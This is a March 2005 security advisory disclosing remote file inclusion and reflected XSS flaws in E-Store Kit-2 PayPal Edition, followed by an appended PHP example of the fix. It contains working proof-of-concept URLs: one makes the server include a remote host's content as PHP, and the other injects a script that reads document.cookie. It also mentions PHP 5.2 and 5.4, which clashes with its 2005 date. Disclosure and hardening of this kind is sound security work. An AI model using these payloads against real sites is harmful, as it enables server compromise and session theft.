-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: High
Title: File inclusion and XSS vulnerabilities in E-Store Kit-2 PayPal Edition
Date: March 26, 2005

Summary:
E-Store Kit-2 PayPal Edition passes user-controlled request parameters to
PHP file includes and echoes them back into HTML without encoding. This gives
a remote file inclusion (RFI) vulnerability in catalog.php and a reflected
cross-site scripting (XSS) vulnerability in downloadform.php.

Proof of Concept Exploits:

1. Remote file inclusion (catalog.php, parameters main and menu):

http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com

The values of main and menu are used as include targets, so the server
fetches http://www.whatismyip.com and evaluates the response as PHP. Pointing
main at an attacker-hosted file that contains PHP code therefore gives command
execution as the web server user and possible compromise of the full system.

2. Reflected XSS (downloadform.php, parameter txn_id):

http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id="><script>alert(document.cookie)</script>

The leading double quote closes the HTML attribute that txn_id is written
into, and the injected script runs in the victim's browser; the PoC pops
document.cookie.

Possible fix:
Pass every user-supplied value through htmlspecialchars() before writing it
into HTML, and never build an include path from request data: map the main and
menu parameters onto a fixed list of local files. Enabling safe_mode in
php.ini is not a reliable fix for the include problem (and safe_mode was
removed in PHP 5.4); instead set allow_url_fopen = Off (PHP 4) or
allow_url_include = Off (PHP 5.2 and later) so that include cannot fetch
remote URLs even if a parameter slips through.

Author:
These vulnerabilities have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to
contact me regarding these vulnerabilities. You can find me at
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab.
Look out for my soon to come out book on Secure coding with php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ
1d0vpE05jqm5pVr597Zxu9m2
=fGEj
-----END PGP SIGNATURE-----
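The fix the advisory proposes, as an added PHP example that is not code from the original advisory or from E-Store Kit-2 (whose source is not shown here). The commented-out vulnerable pattern is what the PoC URLs imply, not the product's actual code. The parameter names main, menu and txn_id come from the PoC URLs; the modules/ and menus/ layout, the helper names param(), resolve_module() and h(), and the modern PHP syntax are assumptions.

```php
<?php
// Added example, not E-Store Kit-2 code. Parameter names main, menu and
// txn_id come from the advisory's PoC URLs; the modules/ and menus/ layout
// and the helper names are assumptions.

// ---- Vulnerable pattern implied by the PoC (do not use) ----
// include $_GET['main'];   // main=http://host/x.txt is fetched and executed
// include $_GET['menu'];   // when allow_url_fopen / allow_url_include is on
// echo '<input name="txn_id" value="' . $_GET['txn_id'] . '">';
//                          // txn_id="><script>...</script> closes the attribute

// ---- Hardened form ----

/** Fetch a scalar GET parameter; arrays such as main[]=x fall back to the default. */
function param(string $name, string $default): string
{
    $v = $_GET[$name] ?? $default;
    return is_string($v) ? $v : $default;
}

/**
 * Map a request parameter onto a fixed server-side file. The user value is
 * only ever used as an array key, never as part of a path or URL, so neither
 * remote URLs nor ../ traversal can reach include.
 */
function resolve_module(string $requested, array $allowed, string $default): string
{
    return $allowed[$requested] ?? $allowed[$default];
}

/**
 * Encode untrusted text for an HTML text node or attribute value.
 * ENT_QUOTES encodes both " and ' so the value cannot close the attribute
 * the PoC breaks out of; ENT_SUBSTITUTE keeps invalid UTF-8 from emptying
 * the output.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$modules = [
    'catalog'  => __DIR__ . '/modules/catalog.php',
    'download' => __DIR__ . '/modules/download.php',
];
$menus = [
    'default' => __DIR__ . '/menus/default.php',
    'paypal'  => __DIR__ . '/menus/paypal.php',
];

// catalog.php?main=http://whatismyip.com&menu=http://whatismyip.com now
// resolves to the default local files instead of a remote URL.
$main = resolve_module(param('main', 'catalog'), $modules, 'catalog');
$menu = resolve_module(param('menu', 'default'), $menus, 'default');
require $menu;
require $main;

// downloadform.php?txn_id="><script>alert(document.cookie)</script>
// is rendered as inert text inside the attribute value.
$txn_id = param('txn_id', '');
echo '<input type="text" name="txn_id" value="' . h($txn_id) . '">';

// Defence in depth (php.ini): allow_url_include = Off, and allow_url_fopen = Off
// on PHP 4, where remote includes were gated only by that setting.
```

To check the hardened script, serve it with the assumed modules/ and menus/ files in place and request both PoC URLs against it: the include parameters resolve to the default local files, and the txn_id value comes back as `&quot;&gt;&lt;script&gt;...` inside the attribute rather than as markup.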